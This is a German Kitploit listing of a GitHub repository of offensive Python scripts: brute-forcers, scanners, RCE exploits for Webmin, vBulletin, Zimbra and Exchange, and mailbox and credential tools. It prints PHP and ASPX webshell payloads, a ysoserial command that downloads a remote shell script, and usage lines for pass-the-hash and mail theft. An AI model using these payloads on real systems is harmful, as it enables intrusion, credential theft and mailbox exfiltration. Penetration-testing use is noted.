Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Homework-of-Python — Python codes of my blog. | Kitploit
Tools/GitHubGitHub/3gstudent/homework-of-python
Vulnerability ScannersPassword AttacksExploitationWeb Application ExploitationInformation GatheringPost-ExploitationRed TeamingPayload Development
GitHub3gstudent/homework-of-python

Homework-of-Python

Python codes of my blog.

Repository anzeigen
412126vor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Homework-of-Python

Python-Codes meines Blogs.

pptp_password_hack.py

Verwendet Brute-Force-Angriffe, um das Passwort des PPTP-VPN zu ermitteln.

Es liest die Passwörter aus einer Datei (namens wordlist) und verwendet dann pptpsetup, um eine Verbindung zum Server herzustellen.

Das Zeitintervall beträgt 10 Sekunden.


portscan.py

Wird verwendet, um Ports zu scannen.

Das Timeout beträgt 3 Sekunden.

c++-Version:

https://github.com/3gstudent/Homework-of-C-Language/blob/master/portscan.cpp


urltoip.py

Wird verwendet, um die IP-Adresse aus einer URL abzurufen.

Ich kann das Ergebnis von Sublist3r direkt verwenden.

file_deduplication(For_urltoip).py

Wird verwendet, um doppelte IP-Adressen aus dem Ergebnis von Sublist3r zu entfernen.

Ich kann das Ergebnis von urltoip.py direkt verwenden.

Die IP-Adressen können mithilfe von Sublime sortiert werden (F9).


file_deduplication.py

Wird verwendet, um doppelte Einträge aus einer Datei zu entfernen.

Webmin<=1.920-Unauthenticated_RCE(CVE-2019-15107).py

Referenz:

https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html


fofa_api.py

Wird verwendet, um die fofa-API aufzurufen und die IP-Adressen aus den Ergebnissen auszugeben.

Du kannst 100 Ergebnisse erhalten.

fofa_api_VIP.py

Wird verwendet, um die fofa-API aufzurufen und die IP-Adressen aus den Ergebnissen auszugeben.

Wenn du VIP bist, erhältst du 10000 Ergebnisse.


vBulletin_5.x_0day_pre-auth_RCE.py

Referenz:

https://seclists.org/fulldisclosure/2019/Sep/31

Z. B.

root@kitploit:~
echo \<?php @eval\(\$_POST[pwd]\)\;?\> >test.php

phpStudy_5.2-5.45_(php_xmlrpc.dll)_backdoor_RCE.py

Referenz:

https://mp.weixin.qq.com/s/dTzWfYGdkNqEl0vd72oC2w

Z. B.

root@kitploit:~
system('cmd /c "echo ^<?php @eval(^$_POST[pwd]);?^> >D:\phpstudy\WWW\test.php"');

ExportFirefoxPassword.py

Wird verwendet, um die Passwörter von Firefox zu exportieren.

get_Exchange_version.py

Wird verwendet, um die Version von Exchange abzurufen.

Zuerst wird die BuildNumber über den Quellcode der URL ermittelt und anschließend die Version abgerufen.

Referenz:

https://docs.microsoft.com/en-us/Exchange/new-features/build-numbers-and-release-dates?redirectedfrom=MSDN&view=exchserver-2019


SMBv3_RCE_Scanner(CVE-2020-0796).py

Wird verwendet, um die SMBv3-RCE-Schwachstelle zu scannen.

Das Timeout beträgt 3 Sekunden.


Unauthenticated_RCE_in_Draytek_Vigor2960\3900\300B.py

Referenz:

https://github.com/imjdl/CVE-2020-8515-PoC

CVE-2020-8515

DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta und Vigor300B 1.3.3_Beta, 1.4.2.1_Beta und 1.4.4_Beta ermöglichen Remote-Codeausführung als root (ohne Authentifizierung) über Shell-Metazeichen im URI cgi-bin/mainfunction.cgi.

Betroffene Produkte:

  • Vigor300B <v1.5.1
  • Vigor2960 <v1.5.1
  • Vigor3900 <v1.5.1

Zimbra_SOAP_API_Manage.py

Verwendet die Zimbra-SOAP-API, um eine Verbindung zum Zimbra-Mailserver herzustellen.

Verwendung:

root@kitploit:~
      Zimbra_SOAP_API.py <url> <username> <password> <mode>

Modus:

  • low Authentifizierung für Low-Token
  • admin Authentifizierung für Admin-Token
  • ssrf Verwende CVE-2019-9621, um das Admin-Token zu erhalten

Z. B.:

root@kitploit:~
      Zimbra_SOAP_API.py https://192.168.1.1 [email protected] password low

checkEWS.py

Wird verwendet, um gültige Konten des Exchange Web Service zu überprüfen (unterstützt Klartext und NTLM-Hash)

Referenz: https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py

Verwendung:

root@kitploit:~
checkEWS.py <host> <port> <mode> <domain> <user> <password>
<mode>:
- plaintext
- ntlmhash

Z. B.

root@kitploit:~
checkEWS.py 192.168.1.1 443 plaintext test.com user1 password1
checkEWS.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1

checkAutodiscover.py

Wird verwendet, um auf Autodiscover.xml zuzugreifen und die Benutzerkonfiguration abzurufen (unterstützt Klartext und NTLM-Hash)

Verwendung:

root@kitploit:~
checkAutodiscover.py <host> <port> <mode> <email> <password> <command>
<command>:
- checkautodiscover
- getusersetting
- checkoab
- downloadlzx

Z. B.

root@kitploit:~
checkAutodiscover.py 192.168.1.1 443 plaintext [email protected] password1 checkaut
odiscover
checkAutodiscover.py test.com 80 ntlmhash [email protected] c5a237b7e9d8e708d8436b6
148a25fa1 getusersetting

checkAutodiscoverEx.py

Erweiterter Modus von checkAutodiscover.py

Fügt einen <domain>-Parameter hinzu.

ewsManage.py

Wird verwendet, um auf Exchange Web Service zuzugreifen (unterstützt Klartext und NTLM-Hash)

Verwendung:

root@kitploit:~
ewsManage.py <host> <port> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
<command>:
- getfolderofinbox
- getfolderofsentitems
- listmailofinbox
- listmailofsentitems
- listmailoffolder
- getmail
- deletemail
- deletefolder
- getattachment
- saveattachment
- getdelegateofinbox
- adddelegateofinbox
- updatedelegateofinbox
- removedelegateofinbox
- getdelegateofinbox2
- updatedelegateofinbox2
- restoredelegateofinbox2
- getinboxrules
- updateinboxrules
- removeinboxrules
- deleteattachment
- createattachment
- createfolderofinbox
- listhiddenfolderofinbox
- createtestmail
- SetHiddenPropertyType
- UpdateHiddenPropertyType
- getcontact
- findpeople
- findallpeople
- resolvename
- resolveallname


Z. B.

root@kitploit:~
ewsManage.py 192.168.1.1 443 plaintext test.com user1 password1 getfolderofinbox
ewsManage.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1 listmailofinbox

sshCheck.py

Wird verwendet, um gültige SSH-Anmeldedaten zu überprüfen (unterstützt Passwort und Private-Key-Datei)

Verwendung:

root@kitploit:~
sshCheck.py <host> <port> <mode><user> <password>
<mode>:
- plaintext
- keyfile

Z. B.

root@kitploit:~
sshCheck.py 192.168.1.1 22 plaintext root toor
sshCheck.py 192.168.1.1 22 keyfile root id_rsa

sshRunCmd

Remote-Befehlsausführung über SSH (unterstützt Passwort und Private-Key-Datei)

Verwendung:

root@kitploit:~
sshRunCmd.py <host> <port> <mode><user> <password> <cmd>
<mode>:
- plaintext
- keyfile
If the <cmd> is shell,you will get an interactive shell

Z. B.

root@kitploit:~
sshRunCmd.py 192.168.1.1 22 plaintext root toor shell
sshRunCmd.py 192.168.1.1 22 keyfile root id_rsa ps

easCheck.py

Wird verwendet, um gültige Anmeldedaten von eas (Exchange Server ActiveSync) zu überprüfen

Verwendung:

root@kitploit:~
easCheck.py <host> <user> <password>

Z. B.

root@kitploit:~
easCheck.py 192.168.1.1 user1 password1

checkOWA.py

Wird verwendet, um gültige Exchange-Konten durch Verbinden mit OWA zu überprüfen.

Verwendung:

root@kitploit:~
checkOWA.py <url> <user> <password>

owaManage.py

Wird verwendet, um E-Mails durch Verbinden mit OWA zu lesen.

Verwendung:

root@kitploit:~
owaManage.py  <url> <user> <password> <command>
<command>
- ListFolder
- ViewMail
- DownloadAttachment

imapManage.py

Verwendet IMAP, um eine Verbindung zum Mailserver herzustellen.

Verwendung:

root@kitploit:~
imapManage.py <IMAP server> <username> <password> <command>    
<command>:
CheckConfig             get the folder name
SaveAttachOfInbox       save the attachments of Inbox
SaveAttachOfSent        save the attachments of Sent
DownloadAllMailOfInbox  download all the mails of Inbox
DownloadAllMailOfSent   download all the mails of Sent
Eg:
imapManage.py 192.168.1.1 user1 password CheckConfig

aspxCmdNTLM.py

Wird verwendet, um die NTLM-Authentifizierung zu implementieren und mit execCmd.aspx zu kommunizieren.

Die Kommunikationsdaten werden mit Base64 kodiert.

Verwendung:

root@kitploit:~
aspxCmdNTLM.py <host> <port> <url> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
Eg.
aspxCmdNTLM.py 192.168.1.1 443 https://192.168.1.1/1.txt plaintext test.com user
1 password1 whoami
aspxCmdNTLM.py test.com 80 http://192.168.1.1/1.aspx ntlmhash test.com user1 c5a
237b7e9d8e708d8436b6148a25fa1 whoami

SharpExchangeBackdoor.py

C#-Version: SharpExchangeBackdoor.cs

Wird verwendet, um Payloads an die Exchange-Webshell-Backdoor zu senden.

Unterstützt:

  • assemblyLoad
  • webshellWrite

Verwendung:

root@kitploit:~
    <url> <user> <password> <mode> <path>
mode:
    assemblyLoad
    webshellWrite

z. B.

root@kitploit:~
    SharpExchangeBackdoor.py https://192.168.1.1/owa/auth/errorFE.aspx no auth assemblyLoad payload.dll
    SharpExchangeBackdoor.py https://192.168.1.1/ecp/About.aspx user1 123456 webshellWrite payload.aspx

assemblyLoad.aspx:

root@kitploit:~
<%@ Page Language="C#" %><%System.Reflection.Assembly.Load(Convert.FromBase64String(Request.Form["demodata"])).CreateInstance("Payload").Equals("");%>

webshellWrite.aspx:

root@kitploit:~
<%@ Page Language="C#" %><%if (Request.Files.Count!=0)Request.Files[0].SaveAs(Server.MapPath("./uploadDemo.aspx"));}%>

Zimbra_deserialization_RCE(CVE-2019-6980).py

Unsicheres Objekt-Deserialisierung - IMAP

Verwendung:

root@kitploit:~
<url> <user> <password> <payload path>

Z. B.

root@kitploit:~
https://192.168.1.1 [email protected] password1 payload.obj

Hinweis:

Du kannst payload.obj folgendermaßen erzeugen:

java -jar ysoserial.jar MozillaRhino2 "/usr/bin/wget https://192.168.1.1/test.sh --no-check-certificate -O /tmp/test.sh" > payload.obj


ExchangeDeserializeShell-NoAuth-TextFormattingRunProperties.py

ExchangeDeserializeShell-NoAuth-ActivitySurrogateSelectorFromFile.py

ExchangeDeserializeShell-NoAuth-ghostfile.py

Wird verwendet, um die Deserialisierungs-Codeausführung von Exchange zu testen.
Von Lese- und Schreibrechten für Exchange-Dateien bis zur Deserialisierungs-Codeausführung. Du solltest den machineKey in %ExchangeInstallPath%\FrontEnd\HttpProxy\\web.config ändern, um die Deserialisierungs-Codeausführung zu implementieren. <path>: owa oder ecp

Verwendung:

root@kitploit:~
    <url> <key> <path>

z. B.

root@kitploit:~
 192.168.1.1 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF owa
 mail.test.com CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF ecp    

Exchange_EWS_XML_Parser.py

Wird verwendet, um Exchange-SOAP-XML-Nachrichten zu parsen.


eacManage.py

Wird verwendet, um auf das Exchange Admin Center zuzugreifen

Verwendung:

root@kitploit:~
eacManage.py <url> <user> <password> <command>
<command>:
- ListAdminRoles
- NewAdminRoles
- EditAdminRoles
- DeleteAdminRoles
- AddMailbox
- RemoveMailbox
- ExportAllMailbox          
- GetCertificate 
- ExportCertificate          
          

vSphereAutomationAPI_Manage.py

Wird verwendet, um die VM mithilfe der vSphere Automation API (v7.0U1+) zu verwalten

Unterstützt Windows- und Linux-VMs

vSphereWebServicesAPI_Manage.py

Wird verwendet, um die VM mithilfe der vSphere Web Services API zu verwalten

Referenz: https://github.com/vmware/pyvmomi/

Installation: pip install --upgrade pyvmomi

vCenterLDAP_Manage.py

Wird verwendet, um die LDAP-Datenbank auf vCenter zu verwalten.


SolarWindsOrion_Manage.py

Wird verwendet, um die SolarWinds-Orion-Plattform zu verwalten

SolarWindsOrionAPI_Manage.py

Verwendet die SolarWinds-Orion-API, um die Orion-Plattform zu verwalten


MailEnableManage.py

Wird verwendet, um den MailEnable-Mailserver zu verwalten


blind_XXEPlatform_CVE-2019-9670.py

Es unterstützt den Empfang von Ergebnissen über das HTTP- oder FTP-Protokoll.


ewsManage_Downloader.py

Wird verwendet, um auf Exchange Web Service zuzugreifen (unterstützt Klartext und NTLM-Hash)

ewsManage_exchangelib_Downloader.py

Wird verwendet, um auf Exchange Web Service zuzugreifen (unterstützt Klartext und NTLM-Hash)

ewsManage_requests_ntlm_Downloader.py

Verwendet requests_ntlm2, um auf Exchange Web Service zuzugreifen (unterstützt Klartext und NTLM-Hash)

ewsManage_requests_ntlm_Session_Downloader.py

Verwendet requests_ntlm2, um auf Exchange Web Service zuzugreifen (unterstützt Klartext und NTLM-Hash)

Verwendet eine Session, um die Kommunikationsdaten zu reduzieren


vCenter_ExtraCertFromMdb.py

Modifiziert von https://github.com/horizon3ai/vcenter_saml_login

vCenter_GenerateLoginCookie.py

Modifiziert von https://github.com/horizon3ai/vcenter_saml_login


Exchange_GetVersion_MatchVul.py

Wird verwendet, um die Exchange-Version abzurufen und mit vorhandenen Schwachstellen abzugleichen

Exchange_GetVersion_ParseFromFile.py

Wird verwendet, um die Exchange-Version abzurufen und die Version von https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019 zu parsen

Du solltest https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019 als exchange.data speichern.

Exchange_GetVersion_ParseFromWebsite.py

Wird verwendet, um die Exchange-Version abzurufen und die Version von https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019 zu parsen


Exchange_GetInternalIP.py

Wird verwendet, um die interne IP-Adresse von Exchange abzurufen

Basiert auf msf auxiliary/scanner/http/owa_iis_internal_ip, unterstützt jedoch mehr Exchange-Server.


vRealizeOperationsManager_GetVersion.py

Wird verwendet, um die Version von vRealize Operations Manager abzurufen


BIG-IP_RunBash.py

Verwendet Bash, um Befehle auszuführen


SophosUTM_plxDecrypter.py

Wird verwendet, um die .plx-Datei von Sophos UTM zu entschlüsseln

Referenz:

https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223

https://github.com/the6p4c/bfs_extract

SophosUTM_ConfigParser.py

Wird verwendet, um die Konfiguration von Sophos UTM zu parsen


Tool herunterladen